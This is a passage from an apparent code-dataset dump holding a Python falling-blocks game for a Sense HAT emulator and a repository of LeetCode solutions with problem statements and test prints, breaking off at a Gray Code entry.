"text": "import math\nfrom random import randrange\nfrom time import sleep\n\nfrom euclid import Point2, Vector2\nfrom sense_emu import SenseHat\n\n\nclass Shape:\n shape_colour = [255, 153, 51]\n\n def __init__(self, shape_type, pos, vel):\n self.shape_type = shape_type\n self.pos = pos\n self.vel = vel\n\n def display(self):\n for point in self.shape_type.points:\n actual_pos = self.pos + point\n if 0 <= actual_pos.x <= 7 and 0 <= actual_pos.y <= 7:\n sense.set_pixel(actual_pos.x, actual_pos.y, self.shape_colour)\n\n def collides(self, shapes, offset):\n for point1 in self.shape_type.points:\n point1_wc = point1 + self.pos\n for shape in shapes:\n if shape != self: # Don't compare this shape to itself\n for point2 in shape.shape_type.points:\n point2_wc = point2 + shape.pos\n if point2_wc - point1_wc == offset:\n return True\n return False\n\n def rotate(self):\n width = self.shape_type.compute_width()\n height = self.shape_type.compute_height()\n points = self.shape_type.points\n\n centre = Point2((width - 1) / 2, (height - 1) / 2)\n for i, point in enumerate(points):\n diff = point - centre # Effectively translate so centre is at origin\n diff[:] = (diff.y, -diff.x) # Effectively rotate around origin\n point = centre + diff # Effectively translate back\n point[:] = map(math.floor, point[:])\n points[i] = point\n\n\nclass ShapeType:\n def __init__(self, points):\n self.points = points\n\n def compute_width(self):\n max_x = max(point.x for point in self.points)\n min_x = min(point.x for point in self.points)\n return abs(max_x - min_x) + 1\n\n def compute_height(self):\n max_y = max(point.y for point in self.points)\n min_y = min(point.y for point in self.points)\n return abs(max_y - min_y) + 1\n\n\ndef move_left(event, shapes):\n if event.action == \"pressed\":\n last_shape = shapes[-1]\n if last_shape.pos.x > 0 and not last_shape.collides(shapes, Vector2(-1, 0)):\n last_shape.pos += Vector2(-1, 0)\n\n\ndef move_right(event, shapes):\n if event.action == \"pressed\":\n last_shape = shapes[-1]\n if (last_shape.pos.x < 8 - last_shape.shape_type.compute_width()\n and not last_shape.collides(shapes, Vector2(1, 0))):\n last_shape.pos += Vector2(1, 0)\n\n\ndef rotate_shape(event, shapes):\n if event.action == \"pressed\":\n last_shape = shapes[-1]\n last_shape.rotate()\n\n\ndef main():\n global sense\n\n # Initial setup\n sense = SenseHat()\n # sense.set_rotation(180)\n # sense.low_light = True\n\n update_interval = 7\n background_colour = [0, 0, 0]\n shape_types = [\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(0, 2),\n Point2(0, 3),\n ]),\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(1, 0),\n Point2(1, 1),\n ]),\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(0, 2),\n Point2(1, 1),\n ]),\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(0, 2),\n Point2(1, 0),\n ]),\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(0, 2),\n Point2(1, 2),\n ]),\n ShapeType([\n Point2(0, 1),\n Point2(0, 2),\n Point2(1, 0),\n Point2(1, 1),\n ]),\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(1, 1),\n Point2(1, 2),\n ]),\n ]\n shapes = []\n count = 0\n\n sense.stick.direction_left = lambda event: move_left(event, shapes)\n sense.stick.direction_right = lambda event: move_right(event, shapes)\n sense.stick.direction_up = lambda event: rotate_shape(event, shapes)\n\n while True:\n sense.clear(background_colour)\n # Update shape velocities\n for shape in shapes:\n if shape.pos.y >= 8 - shape.shape_type.compute_height() or shape.collides(shapes, Vector2(0, 1)):\n shape.vel = Vector2(0, 0)\n\n # Update shape positions based on their updated velocities\n for shape in shapes:\n shape.pos += shape.vel\n\n # Set count to zero if update interval exceed\n if count >= update_interval:\n count = 0\n\n # If interval reached, choose random shape type then add to `moving_shapes` list\n if count == 0:\n shape_type = shape_types[randrange(len(shape_types))]\n pos = Point2(randrange(9 - shape_type.compute_width()), 1 - shape_type.compute_height())\n initial_vel = Vector2(0, 1)\n shape = Shape(shape_type, pos, initial_vel)\n shapes.append(shape)\n\n # Display shapes\n for shape in shapes:\n shape.display()\n\n # Increment count and wait\n count += 1\n sleep(1)\n # sense.low_light = False\n\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 1 |
KnightChan/LeetCode-Python | https://github.com/KnightChan/LeetCode-Python | 41db7948dc2d02c7f58b6e574397ff5d59ecbfdc | d16e4724ee34a0046cb2a8b0b13139b43d284e83 | f4021be29a7fd8a55a9f93a910aba1d6d62cd5ca | refs/heads/master | 2020-04-15T08:44:38.585819 | 2015-03-08T06:21:41 | 2015-03-08T06:21:41 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5859649181365967,
"alphanum_fraction": 0.6140350699424744,
"avg_line_length": 41.75,
"blob_id": "f6b3be007de871971ff95b78e31c6234adc11abc",
"content_id": "8798feeebcf02c7c24499450013fbe6234eee6cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 855,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 20,
"path": "/Two Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a tuple, (index1, index2)\n def twoSum(self, num, target):\n '''Given an array of integers, find two numbers such that they add up to a specific target number.\n\nThe function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2. Please note that your returned answers (both index1 and index2) are not zero-based.\n\nYou may assume that each input would have exactly one solution.\n\nInput: numbers={2, 7, 11, 15}, target=9\nOutput: index1=1, index2=2 '''\n if len(num) < 2:\n return (0, 0)\n dic = {}\n for i in range(0, len(num)):\n dic[num[i]] = i\n for i in range(0, len(num)):\n need = target - num[i]\n if need in dic and dic[need] != i:\n return (i + 1, dic[need] + 1)\n"
},
{
"alpha_fraction": 0.41897082328796387,
"alphanum_fraction": 0.44508448243141174,
"avg_line_length": 30.768293380737305,
"blob_id": "3e3ecd5339ce3e3cc9d3d282129d02238c83a655",
"content_id": "f541692272bbaa85a75285edfe0c1fe92a240216",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2612,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 82,
"path": "/3Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\nclass Solution:\n # @return a list of lists of length 3, [[val1,val2,val3]]\n def threeSum(self, num):\n '''\n Given an array S of n integers, are there elements a, b, c in S such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.\n\nNote:\n\n Elements in a triplet (a,b,c) must be in non-descending order. (ie, a ≤ b ≤ c)\n The solution set must not contain duplicate triplets.\n\n For example, given array S = {-1 0 1 2 -1 -4},\n\n A solution set is:\n (-1, 0, 1)\n (-1, -1, 2)\n '''\n num.sort()\n resset = set()\n for i in range(len(num) - 2):\n if i > 0 and num[i] == num[i - 1]:\n continue\n j = i + 1\n k = len(num) - 1\n while j < k:\n x = num[i] + num[j] + num[k]\n if x == 0:\n resset.add((num[i], num[j], num[k]))\n j += 1\n k -= 1\n elif x < 0:\n j += 1\n else:\n k -= 1\n res = []\n for item in resset:\n res.append([item[0], item[1], item[2]])\n return res\n\n # @return a list of lists of length 3, [[val1,val2,val3]]\n def threeSum_withDic(self, num):\n '''\n Given an array S of n integers, are there elements a, b, c in S such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.\n\nNote:\n\n Elements in a triplet (a,b,c) must be in non-descending order. (ie, a ≤ b ≤ c)\n The solution set must not contain duplicate triplets.\n\n For example, given array S = {-1 0 1 2 -1 -4},\n\n A solution set is:\n (-1, 0, 1)\n (-1, -1, 2)\n '''\n num.sort()\n dic = {}\n res = []\n for i in range(len(num)):\n dic[num[i]] = i\n for i in range(len(num) - 2):\n if i > 0 and num[i] == num[i - 1]:\n continue\n for j in range(i + 1, len(num) - 1):\n if j > i + 1 and num[j] == num[j - 1]:\n continue\n kv = -num[i] - num[j]\n if kv in dic and dic[kv] > j:\n if len(res) > 0:\n x = res.pop()\n res.append(x)\n if x[0] == num[i] and x[1] == num[j] and x[2] == kv:\n continue\n res.append([num[i], num[j], kv])\n return res\n\nnum1 = [-1, 0, 1, 2, -1, -4]\nnum = num1\nprint(len(num), num)\nres = Solution.threeSum(Solution(), num)\nprint(len(res), res)"
},
{
"alpha_fraction": 0.4985741376876831,
"alphanum_fraction": 0.5038022994995117,
"avg_line_length": 25.987178802490234,
"blob_id": "b0a06a4e48a89070c92294eaaef2da5924d77869",
"content_id": "e9865e7bbd3c6fae6fd49c7fc2c248e9366fa9ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2104,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 78,
"path": "/Copy List with Random Pointer.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list with a random pointer.\n# class RandomListNode:\n# def __init__(self, x):\n# self.label = x\n# self.next = None\n# self.random = None\n\nclass Solution:\n # @param head, a RandomListNode\n # @return a RandomListNode\n def copyRandomList(self, head):\n ''' A linked list is given such that each node contains an additional random pointer which could point to any node in the list or null.\n\nReturn a deep copy of the list. '''\n if head is None:\n return None\n tp = head\n while tp is not None:\n tpc = RandomListNode(tp.label)\n tpc.next = tp.next\n tp.next = tpc\n tp = tpc.next\n tp = head\n while tp is not None:\n if tp.random is not None:\n tp.next.random = tp.random.next\n tp = tp.next.next\n h1 = head\n h2 = head.next\n tp = head\n while tp.next is not None:\n t = tp.next\n tp.next = tp.next.next\n tp = t\n head = h1\n return h2\n\nclass RandomListNode:\n def __init__(self, x):\n self.label = x\n self.next = None\n self.random = None\n\n def __str__(self):\n #print(\"in str\")\n tmp = self\n if tmp is None:\n return \"None!\"\n strs = []\n while tmp.next is not None:\n x = \"N\"\n if tmp.random is not None:\n x = str(tmp.random.label)\n strs.append(\"(\" + str(tmp.label) + \",\" + x + \")->\")\n tmp = tmp.next\n else:\n x = \"N\"\n if tmp.random is not None:\n x = str(tmp.random.label)\n strs.append(\"(\" + str(tmp.label) + \",\" + x + \");\")\n return \"\".join(strs)\n\nin0 = [1, 2, 2, 2]\n\nins = [in0]\n\nfor tin in ins:\n head = RandomListNode(0)\n tail = head\n for val in tin:\n tail.next = RandomListNode(val)\n tail = tail.next\n ss = Solution()\n print(len(tin), tin)\n print(head.next)\n print(ss.copyRandomList(head.next))\n print(head.next)\n print()"
},
{
"alpha_fraction": 0.4268476665019989,
"alphanum_fraction": 0.47586727142333984,
"avg_line_length": 29.86046600341797,
"blob_id": "66c0dd193fff3295331078315f51296e7d67e7d1",
"content_id": "176f9bd3bcde9cf075461cdde07a5366efe82081",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1326,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 43,
"path": "/Single Number II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integer\n # @return an integer\n def singleNumber(self, A):\n ''' Given an array of integers, every element appears three times except for one. Find that single one.\n\nNote:\nYour algorithm should have a linear runtime complexity. Could you implement it without using extra memory? '''\n ones = 0\n twos = 0\n for a in A:\n threes = twos & a\n twos = (twos | (ones & a)) & ~threes\n ones = (ones | a) & ~threes & ~twos\n return ones\n\n def singleNumber1(self, A):\n xbits = [1]\n bcounts = [0]\n l = 0\n for i in range(1, 32):\n xbits.append(xbits[l] << 1)\n bcounts.append(0)\n l += 1\n for a in A:\n while a > xbits[l]:\n xbits.append(xbits[l] << 1)\n bcounts.append(0)\n l += 1\n for a in A:\n for i in range(0, l + 1):\n bcounts[i] += (a & xbits[i]) >> i\n res = 0\n for i in range(0, 31):\n res += bcounts[i] % 3 * xbits[i]\n return res - bcounts[31] % 3 * xbits[31]\n\nA = [1, 2, 3, 3, 2, 1, 4, 5, 4, 1, 2, 3, 4, 6, 5, 5]\nA1 = [1, 1, 2, 1, 2, 2, 99]\nA2 = [-2, -2, 1, 1, -3, 1, -3, -3, -4, -2]\nso = Solution()\nres = so.singleNumber1(A2)\nprint(res)"
},
{
"alpha_fraction": 0.5280268788337708,
"alphanum_fraction": 0.5515695214271545,
"avg_line_length": 33.32692337036133,
"blob_id": "ef5750be8dc9bd77aea860d8a013d7c85bde7590",
"content_id": "fe001eecd27fdc1530d6700218eb358aeb58ba1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1794,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 52,
"path": "/Combination Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param candidates, a list of integers\n # @param target, integer\n # @return a list of lists of integers\n def combinationSum(self, candidates, target):\n '''\n Given a set of candidate numbers (C) and a target number (T), find all unique combinations in C where the candidate numbers sums to T.\n\nThe same repeated number may be chosen from C unlimited number of times.\n\nNote:\n\n All numbers (including target) will be positive integers.\n Elements in a combination (a1, a2, … , ak) must be in non-descending order. (ie, a1 ≤ a2 ≤ … ≤ ak).\n The solution set must not contain duplicate combinations.\n\nFor example, given candidate set 2,3,6,7 and target 7,\nA solution set is:\n[7]\n[2, 2, 3] \n '''\n p = [set() for i in range(target + 1)]\n f = [False] * (target + 1)\n last_no = [-1] * (target + 1)\n f[0] = True\n candidates.sort(reverse=True)\n for i in range(len(candidates)):\n for j in range(candidates[i], target + 1):\n if f[j - candidates[i]] and i >= last_no[j - candidates[i]]:\n f[j] = True\n p[j].add(j - candidates[i])\n last_no[j] = i\n res = []\n self.path_dfs(p, target, [], res)\n return res\n\n def path_dfs(self, path, v, nowlist, res):\n if v == 0:\n res.append(list(nowlist))\n return\n for par in path[v]:\n if len(nowlist) > 0 and v - par < nowlist[len(nowlist) - 1]:\n continue\n nowlist.append(v - par)\n self.path_dfs(path, par, nowlist, res)\n nowlist.pop()\n\na0 = [10, [2, 3, 6, 7]]\na1 = [8, [10, 1, 2, 7, 6, 1, 5]]\na = a1\nprint(a)\nprint(Solution.combinationSum(Solution(), a[1], a[0]))"
},
{
"alpha_fraction": 0.5230202674865723,
"alphanum_fraction": 0.559852659702301,
"avg_line_length": 27.605262756347656,
"blob_id": "91ab6b57976d46f9595a7a3b04be8a619e2db505",
"content_id": "fb8d27a92cc929ba0ae4812bdbd9dd6830467954",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1086,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 38,
"path": "/Largest Rectangle in Histogram.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param height, a list of integer\n # @return an integer\n def largestRectangleArea(self, height):\n '''\n Given n non-negative integers representing the histogram's bar height where the width of each bar is 1, find the area of largest rectangle in the histogram.\n\n\nAbove is a histogram where width of each bar is 1, given height = [2,1,5,6,2,3].\n\n\nThe largest rectangle is shown in the shaded area, which has area = 10 unit.\n\nFor example,\nGiven height = [2,1,5,6,2,3],\nreturn 10. \n '''\n n = len(height) + 1\n height.append(-1)\n stack = [[-1, -1]]\n maximum = 0\n for i in range(n):\n last = stack.pop()\n k = i\n while height[i] < last[0]:\n maximum = max(maximum, (i - last[1]) * last[0])\n k = last[1]\n last = stack.pop()\n stack.append(last)\n stack.append([height[i], k])\n return maximum\n\na1 = []\na2 = [2,1,5,6,2,3]\na3 = [2,1,2]\na = a3\nprint(len(a), a)\nprint(Solution.largestRectangleArea(Solution(), a))"
},
{
"alpha_fraction": 0.4316290020942688,
"alphanum_fraction": 0.48632580041885376,
"avg_line_length": 25.3125,
"blob_id": "0a3f9635c2a82c509a9b226cf19abb679ba42255",
"content_id": "5db01a655a0af79b0cfbb8322a0e4c3547d77caf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 841,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 32,
"path": "/First Missing Positive.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integers\n # @return an integer\n def firstMissingPositive(self, A):\n '''\n Given an unsorted integer array, find the first missing positive integer.\n\nFor example,\nGiven [1,2,0] return 3,\nand [3,4,-1,1] return 2.\n\nYour algorithm should run in O(n) time and uses constant space. \n '''\n if len(A) == 0:\n return 1\n for i in range(len(A)):\n while 0 < A[i] < len(A) and A[i] != i + 1 and A[A[i] - 1] != A[i]:\n j = A[i] - 1\n A[i], A[j] = A[j], A[i]\n i = 0\n while i < len(A):\n if A[i] != i + 1:\n break\n i += 1\n return i + 1\n\na0 = [-10,-3,-100,-1000,-239,1]\na1 = [-1,4,2,1,9,10]\na2 = [1, 1]\na = a2\nprint(a)\nprint(Solution.firstMissingPositive(Solution(), a))"
},
{
"alpha_fraction": 0.46603477001190186,
"alphanum_fraction": 0.4857819974422455,
"avg_line_length": 34.19444274902344,
"blob_id": "c67345d2509b9e966e5ed8108c4b59f77b084744",
"content_id": "5029931da9d0bb1720cf1cba238823f5ab8ac30a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1266,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 36,
"path": "/Palindrome Partitioning II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @return an integer\n def minCut(self, s):\n ''' Given a string s, partition s such that every substring of the partition is a palindrome.\n\nReturn the minimum cuts needed for a palindrome partitioning of s.\n\nFor example, given s = \"aab\",\nReturn 1 since the palindrome partitioning [\"aa\",\"b\"] could be produced using 1 cut. '''\n n = len(s)\n if n <= 1:\n return 0\n is_palindrome = [[False] * n for row in range(n)]\n for pos in range(0, n):\n l = 0\n while pos - l >= 0 and pos + l <= n - 1 and s[pos - l] == s[pos + l]:\n is_palindrome[pos - l][pos + l] = True\n l += 1\n l = 0\n while pos - l - 1 >= 0 and pos + l <= n - 1 and s[pos - l - 1] == s[pos + l]:\n is_palindrome[pos - l - 1][pos + l] = True\n l += 1\n min_cut = list(range(n + 1))\n min_cut[n] = 0\n for i in range(n - 1, -1, -1):\n min_cut[i] = n\n for j in range(i, n):\n if is_palindrome[i][j]:\n min_cut[i] = min(min_cut[i], min_cut[j + 1] + 1)\n return min_cut[0] - 1\n\ns='aab'\nprint(len(s))\nprint(s)\nprint(Solution.minCut(Solution(), s))"
},
{
"alpha_fraction": 0.437313437461853,
"alphanum_fraction": 0.46716418862342834,
"avg_line_length": 20.612903594970703,
"blob_id": "be066a433f456d0da594780c67064fe197650dc8",
"content_id": "9a797aca61863b6963e73ad1d9a3643ae9186c3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 670,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 31,
"path": "/Combinations.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of lists of integers\n def combine(self, n, k):\n '''\n Given two integers n and k, return all possible combinations of k numbers out of 1 ... n.\n\nFor example,\nIf n = 4 and k = 2, a solution is:\n\n[\n [2,4],\n [3,4],\n [2,3],\n [1,2],\n [1,3],\n [1,4],\n]\n\n '''\n res = []\n self.dfs(n, k, 0, 0, [], res)\n return res\n \n def dfs(self, n, k, ith, x, nowlist, res):\n if ith == k:\n res.append(list(nowlist))\n return\n for v in range(x + 1, n + 1):\n nowlist.append(v)\n self.dfs(n, k, ith + 1, v, nowlist, res)\n nowlist.pop()\n"
},
{
"alpha_fraction": 0.40502792596817017,
"alphanum_fraction": 0.42085662484169006,
"avg_line_length": 26.564102172851562,
"blob_id": "3011a2537e6bae9563e84750eb551feba253e5e3",
"content_id": "349637e3c122c9f695c113f3eab06f347d160826",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1074,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 39,
"path": "/Search in Rotated Sorted Array II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A a list of integers\n # @param target an integer\n # @return a boolean\n def search(self, A, target):\n '''\n Follow up for \"Search in Rotated Sorted Array\":\nWhat if duplicates are allowed?\n\nWould this affect the run-time complexity? How and why?\n\nWrite a function to determine if a given target is in the array.\n '''\n l, r = 0, len(A) - 1\n while l <= r:\n if l == r:\n return target == A[l]\n mid = (l + r) // 2\n if A[mid] == target:\n return True\n if A[mid] == A[r]:\n r -= 1\n continue\n if A[mid] > A[r]:\n if A[l] <= target < A[mid]:\n r = mid - 1\n else:\n l = mid + 1\n else:\n if A[mid] < target <= A[r]:\n l = mid + 1\n else:\n r = mid - 1\n return False\n\na1 = [0, [1, 3]]\na = a1\nprint(a[0], a[1])\nprint(Solution.search(Solution(), a[1], a[0]))"
},
{
"alpha_fraction": 0.47543221712112427,
"alphanum_fraction": 0.4890809953212738,
"avg_line_length": 22.147367477416992,
"blob_id": "1f175aa07d79961dc2b76a632de03644f8c9f4ff",
"content_id": "41e172168a61a8051a37599c2ebaadf4de299d94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2222,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 95,
"path": "/Reorder List.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return nothing\n def reorderList(self, head):\n \"\"\" Given a singly linked list L: L0→L1→…→Ln-1→Ln,\nreorder it to: L0→Ln→L1→Ln-1→L2→Ln-2→…\n\nYou must do this in-place without altering the nodes' values.\n\nFor example,\nGiven {1,2,3,4}, reorder it to {1,4,2,3}. \"\"\"\n size = 0\n lhead = head\n rhead = head\n while rhead:\n size += 1\n rhead = rhead.next\n if size <= 1:\n return head\n halfsize = size - size // 2\n rhead = head\n tmp = None\n while halfsize > 0:\n if halfsize == 1:\n tmp = rhead\n rhead = rhead.next\n halfsize -= 1\n tmp.next = None\n #print('rhead : ', rhead)\n\n rhead = self.reverseList(rhead)\n\n #print('lhead : ', lhead)\n #print('rhead : ', rhead)\n\n head = lhead\n while rhead:\n lnext = lhead.next\n tmp = rhead\n rhead = rhead.next\n lhead.next = tmp\n tmp.next = lnext\n lhead = lnext\n\n def reverseList(self, head):\n if head is None or head.next is None:\n return head\n pnext = head.next\n head.next = None\n while pnext:\n tmp = pnext\n pnext = pnext.next\n tmp.next = head\n head = tmp\n return head\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __str__(self):\n # print(\"in str\")\n tmp = self\n strs = []\n while tmp.next is not None:\n strs.append(str(tmp.val) + \"->\")\n tmp = tmp.next\n else:\n strs.append(str(tmp.val) + \";\")\n return \"\".join(strs)\n\nin0 = [1, 2, 3, 4]\n\nins = [in0]\n\nfor tin in ins:\n head = ListNode(0)\n tail = head\n for val in tin:\n tail.next = ListNode(val)\n tail = tail.next\n ss = Solution()\n print(len(tin), tin)\n print(head)\n ss.reorderList(head.next)\n print(head.next)\n print()"
},
{
"alpha_fraction": 0.4396946430206299,
"alphanum_fraction": 0.4519084095954895,
"avg_line_length": 27.478260040283203,
"blob_id": "0733b22bbfe8b929cfaed315ff8c77e5d654343d",
"content_id": "a2aa6c8e9434bd609cff50649b837ad54099d7b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 23,
"path": "/Generate Parentheses.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param an integer\n # @return a list of string\n def generateParenthesis(self, n):\n '''\n Given n pairs of parentheses, write a function to generate all combinations of well-formed parentheses.\n\nFor example, given n = 3, a solution set is:\n\n\"((()))\", \"(()())\", \"(())()\", \"()(())\", \"()()()\" \n '''\n res = []\n self.dfs(n, 0, '', res)\n return res\n \n def dfs(self, x, y, now, res):\n if x + y == 0:\n res.append(now)\n return\n if x > 0:\n self.dfs(x - 1, y + 1, now + '(', res)\n if y > 0:\n self.dfs(x, y - 1, now + ')', res)\n"
},
{
"alpha_fraction": 0.5367761850357056,
"alphanum_fraction": 0.5586854219436646,
"avg_line_length": 33.56756591796875,
"blob_id": "77cac29a2de03ac163383086bc9c97e00edaac5c",
"content_id": "1c5f35b00f878676f095ae11a709469b262dc0a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1278,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 37,
"path": "/Best Time to Buy and Sell Stock III.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param prices, a list of integer\n # @return an integer\n def maxProfit(self, prices):\n '''Say you have an array for which the ith element is the price of a given stock on day i.\n\nDesign an algorithm to find the maximum profit. You may complete at most two transactions.\n\nNote:\nYou may not engage in multiple transactions at the same time (ie, you must sell the stock before you buy again).'''\n n = len(prices)\n if n <= 1:\n return 0\n min_price = prices[0]\n ltor_profits = [0] * n\n for i in range(1, n):\n if prices[i] < min_price:\n min_price = prices[i]\n ltor_profits[i] = max(ltor_profits[i - 1], prices[i] - min_price)\n\n rtol_profits = [0] * (n + 1)\n rtol_profits[n] = 0\n max_price = prices[n - 1]\n for i in range(n - 2, -1, -1):\n if prices[i] > max_price:\n max_price = prices[i]\n rtol_profits[i] = max(rtol_profits[i + 1], max_price - prices[i])\n max_profit = 0\n for i in range(0, n):\n max_profit = max(max_profit, ltor_profits[i] + rtol_profits[i + 1])\n return max_profit\n\na1 = [2, 1]\na2 = \t[3,2,6,5,0,3]\na = a2\nprint(a)\nprint(Solution.maxProfit(Solution(), a))"
},
{
"alpha_fraction": 0.5335720777511597,
"alphanum_fraction": 0.5389435887336731,
"avg_line_length": 25.595237731933594,
"blob_id": "7c5a8f89d88a563b0a6d500723ead749de5217af",
"content_id": "3f4495c84cf5dcb5c8518b9a784bdbe368c6752d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1117,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 42,
"path": "/Binary Tree Maximum Path Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return an integer\n def maxPathSum(self, root):\n ''' Given a binary tree, find the maximum path sum.\n\nThe path may start and end at any node in the tree.\n\nFor example:\nGiven the below binary tree,\n\n 1\n / \\\n 2 3\n\nReturn 6. '''\n sumwithroot, maxSum = self.maxTreeSum(root)\n return maxSum\n \n def maxTreeSum(self, node):\n if node is None:\n return [0, 0]\n sum = node.val\n tmax = node.val\n l, lmax = self.maxTreeSum(node.left)\n r, rmax = self.maxTreeSum(node.right)\n if node.left is not None:\n sum = max(sum, l + node.val)\n tmax = max(tmax, sum, l, lmax)\n if node.right is not None:\n sum = max(sum, r + node.val)\n tmax = max(tmax, sum, r, rmax)\n if node.left and node.right:\n tmax = max(tmax, l + r + node.val)\n return [sum, tmax]\n"
},
{
"alpha_fraction": 0.4435114562511444,
"alphanum_fraction": 0.44503816962242126,
"avg_line_length": 28.11111068725586,
"blob_id": "f75598b80dcdd5d8642a39d46717d60a4d64dff8",
"content_id": "3d6e99fb693a979ea821f1009602e2be17eeea18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1310,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 45,
"path": "/Merge k Sorted Lists.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n#the online judge has already import headq, so del the next line to submit\nimport heapq\n\nclass Solution:\n # @param a list of ListNode\n # @return a ListNode\n def mergeKLists(self, lists):\n '''\n Merge k sorted linked lists and return it as one sorted list. Analyze and describe its complexity. \n '''\n dic = {}\n \n heap = []\n heapq.heapify(heap)\n for l in lists:\n if l:\n if l.val not in dic:\n dic[l.val] = []\n heapq.heappush(heap, l.val)\n dic[l.val].append(l)\n dummyHead = ListNode(0)\n tdh = dummyHead\n while True:\n if len(heap) == 0:\n break\n x = heapq.heappop(heap)\n for l in dic[x]:\n t = l\n l = l.next\n if l:\n if l.val not in dic:\n dic[l.val] = []\n heapq.heappush(heap, l.val)\n dic[l.val].append(l)\n t.next = None\n tdh.next = t\n tdh = t\n del dic[x]\n return dummyHead.next\n"
},
{
"alpha_fraction": 0.6284454464912415,
"alphanum_fraction": 0.6593164205551147,
"avg_line_length": 28.29032325744629,
"blob_id": "db94a355729f0029eb92ddcd0e36c532f4361f73",
"content_id": "013a4b133b74e6a6947de8b162e457e9e6b2fd5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 907,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 31,
"path": "/Gray Code.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
